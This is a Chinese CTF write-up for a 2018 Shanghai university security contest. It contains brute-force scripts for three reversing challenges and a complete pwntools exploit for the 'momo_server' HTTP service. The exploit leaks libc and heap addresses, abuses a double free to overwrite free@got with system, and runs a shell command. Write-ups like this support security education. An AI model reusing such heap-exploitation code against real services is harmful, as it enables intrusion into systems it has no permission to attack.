[第四届上海市大学生网络安全大赛] writeups
2018-12-02 本文已影响0人
2mpossible
- 复现一下当时没做出来的题目
what is it
- 程序逻辑很简单,对输入的luck string md5加密后会有校验,然后会调用decode函数对check函数进行解码,才能看到check函数
- 先爆破luck string,得到luck string为ozulmt
import hashlib
import itertools
def md5_crypto(data):
md = hashlib.md5()
md.update(data)
sigh = md.hexdigest()
return sigh
charset = [chr(i) for i in range(97,123)]
inputs = itertools.product(charset,repeat=6)
for i in inputs:
input = "".join(i)
cipher = md5_crypto(input)
v15 = 0
v14 = 0
for i in range(32):
if cipher[i] == '0':
v15 += 1
v14 += i
if (10 * v15 + v14 == 403):
print input
exit()
- 得到luck string,我们就可以在decode函数执行完的时候把内存dump出来,这样就可以查看check函数,这里可以参考菜鸟教你用esp定律手脱UPX壳,然后分析check函数,会先对flag格式进行检查,最后会有一个比较,直接下断点就可以看到比较的内容
- 所以flag就是那串比较的东西然后套上flag的格式
cpp
- 看起来c++很难看,其实仔细研究一下还是很简单的程序逻辑,这里operator[]就是取数组元素的操作
#程序逻辑
for i in range(len(a1)):
v2 = 4 * a1[i]
a[i]= ( ((a1[i]) >> 6 | v2) ^ i ) & 0xff
for i in range(4):
for j in range(1,len(s)):
v2 = a1[j]
v3 = a1[j-1] | v2
a1[j] = ( v3 & ( 0xffffffff - (a1[j] & a1[j-1]) )) & 0xff
- 然后写个脚本爆破
def crypto(i,j):
return (((i >> 6) | (4 * i)) ^ j ) & 0xff
a = [0x99,0xb0,0x87,0x9e,0x70,0xe8,0x41,0x44,0x05,0x04,0x8b,0x9a,0x74,0xbc,0x55,0x58,0xb5,0x61,0x8e,0x36,0xac,0x09,0x59,0xe5,0x61,0xdd,0x3e,0x3f,0xb9,0x15,0xed,0xd5]
flag = 'f'
num = 1
while num < len(a):
for i in range(0x20,0x7f):
c = []
for j in range(len(flag)):
c.append(crypto(ord(flag[j]),j))
c.append(crypto(i,num))
for l in range(4):
for m in range(1,len(c)):
v3 = c[m-1] | c[m]
v1 = ( v3 & ( 0xffffffff - (c[m] & c[m-1]) )) & 0xff
c[m] = v1
if c[num] == a[num]:
print chr(i)
flag += chr(i)
num += 1
break
print flag
cyvm
- 一道入门级的vm逆向,主要用循环来表示程序逻辑
- 一个一个手动跟了一下发现是个蛮简单的循环逻辑
0F 10 14 20 10 16 00 09 24 02 15 16 E9 12 16 E8
02 17 16 13 16 90 06 15 17 45 06 15 16 76 01 15
16 12 16 FF 0A 14 16 0C 09 0E ?? ?? ?? ?? ?? ??
0f scanf
09 jmp
0c cmp
scanf('%s',s)
*(&v7 + *(v5 + 1 + a1) -20) = *(v5 + 2 + a1)
v7[0] = 0x20
i = 0x00
v5 = 0x24
if 0x20 != i:
v5 = 0x9
else:
v5 += 2
a = s[i]
b = s[i+1]
a ^= b
a ^= i
s[i] = a
++i
if 0x20 != i:
v5 = 0x9
else:
v5 += 2
- 所以程序逻辑可表示如下:
for i in range(len(s)):
a = s[i]
b = s[i+1]
a ^= b
a ^= i
s[i] = a
- 写个脚本爆破出flag
flag = 'f'
s2 = [0x0a, 0x0c, 0x04, 0x1f, 0x48, 0x5a, 0x5f, 0x03, 0x62, 0x67, 0x0e, 0x61, 0x1e, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7c, 0x39, 0x54, 0x4b, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0e, 0x62]
while True:
if len(flag) >= 0x20:
break
for i in range(0x20,0x7f):
j = len(flag)
a = ord(flag[j-1])
b = i
a ^= b
a ^= (j-1)
if a == s2[j-1]:
flag += chr(i)
break
print flag
momo_server
- 考验选手逆向和对http协议的了解,漏洞就是一个double free,改
free@got为system地址,wp已经有人写的比较详细了,就不再重复了。(该程序由于用sscanf传参所以如果memo=后的内容有00字符串则会崩溃)
exp:
from pwn import *
from urllib import quote
#context.log_level ='debug'
def http(method,operating,content):
payload = method
payload += ' ' + operating + ' Connection: keep-alive'
payload += '\n\n' + content
return payload
def get_list():
payload = http('GET','/list','')
p.send(payload)
def add(memo,count):
content = 'memo={}&count={}'.format(memo,count)
payload = http('POST','/add',content)
p.send(payload)
def count():
payload = http('POST','/count','')
p.send(payload)
def echo(con):
content = 'content={}'.format(con)
payload = http('POST','/echo',content)
p.send(payload)
while True:
try:
p = process('./pwn')
libc = ELF('./libc-so.6')
#leak libc
echo('0'*0x34 + 'aaaa')
p.recvuntil('aaaa')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x5f0e14
assert libc_base & 0xff == 0
log.success('libc base addr : 0x%x'%libc_base)
system_addr = libc_base + libc.symbols['system']
log.success('system addr : 0x%x'%system_addr)
add('a'*0x60,'1')
add('b'*0x60,'2')
add('c'*0x60,'3')
add('d'*0x60,'4')
add('e'*0x60,'200')
#leak heap_base
count()
sleep(4)
get_list()
p.recvuntil('0</td></tr><tr><td>')
heap_base = u64(p.recvuntil('\x3c',drop = True).ljust(8,'\x00')) -0x20
log.success('heap_base addr : 0x%x'%heap_base)
#double free
add(p64(heap_base+0xa0).replace('\0', ''),'1') # 0 -> 1 -> 0
sleep(3)
#hijack fd -> 0x602ffa
add(quote(p64(0x602ffa).ljust(0x60,'a')),'200') # 1 -> 0 -> 0x602ffa
sleep(1)
add(quote('bbbbbbbbb'.ljust(0x60,'a')),'200') # 0 -> 0x602ffa
sleep(1)
#cat flag
add(quote('cat flag\x00'.ljust(0x60,'a')),'3')
sleep(1)
#gdb.attach(p,'b *0x401482')
#hijack got@free -> system and trigger system('cat flag')
add(quote(('a'*14 + p64(system_addr)).ljust(0x60,'a')),'200')
p.interactive()
except Exception as e:
p.close()
参考文章:
